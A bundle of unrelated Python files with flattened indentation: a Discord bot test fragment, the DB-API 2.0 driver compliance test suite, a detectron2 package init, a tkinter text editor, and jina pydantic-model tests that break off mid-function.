)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
|
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
# Revision 1.12 2009/02/06 03:35:11 kf7xm
# Tested okay with Python 3.0, includes last minute patches from Mark H.
#
# Revision 1.1.1.1.2.1 2008/09/20 19:54:59 rupole
# Include latest changes from main branch
# Updates for py3k
#
# Revision 1.11 2005/01/02 02:41:01 zenzen
# Update author email address
#
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception hierarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propagates
# - VARCHAR columns now have a width, which will hopefully make the
#     DDL even more portable (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
#     nothing)
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
is structured so that other self.drivers can subclass this
        test case to ensure compliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
self.drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
''' self.drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
''' self.drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
# defined hierarchy.
        if sys.version[0] == '3': #under Python 3 StandardError no longer exists
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
                'cursor.rowcount should == number of rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
# connection.commit should raise an Error if called after connection'
# closed.'
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
        # Issue discussed on DB-SIG: consensus seems that close() should not
        # raise if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
#issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
            # after executing a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
sql=self._populate()
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
# Real test for setoutputsize is driver dependent
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
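# A sketch of how a driver's test suite would subclass DatabaseAPI20Test, per
# the instructions in the class docstring above. The use of sqlite3 and the
# connection arguments are illustrative assumptions, not part of this module;
# the example is kept commented out so importing dbapi20 has no side effects.
#
#   import sqlite3
#   import dbapi20
#
#   class SQLite3APITest(dbapi20.DatabaseAPI20Test):
#       driver = sqlite3
#       connect_args = (':memory:',)
#       connect_kw_args = {}
#
#       def test_nextset(self):
#           pass  # nextset is not supported by this driver
#
#       def test_setoutputsize(self):
#           pass  # driver-dependent; not exercised here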
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn # isort:skip
__all__ = list(globals().keys())
|
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
|
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
"""This tests: all internal schema definitions are part of parent"""
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
"""This tests: all enums are defined properly as different levels"""
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
"""This tests: all fields are picked from the proto definition"""
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
"""This tests validation error for invalid fields"""
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
# TODO: Issue about having proper ListValueView, not really expected
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
"""This tests: repeated fields are represented as `array`"""
assert (
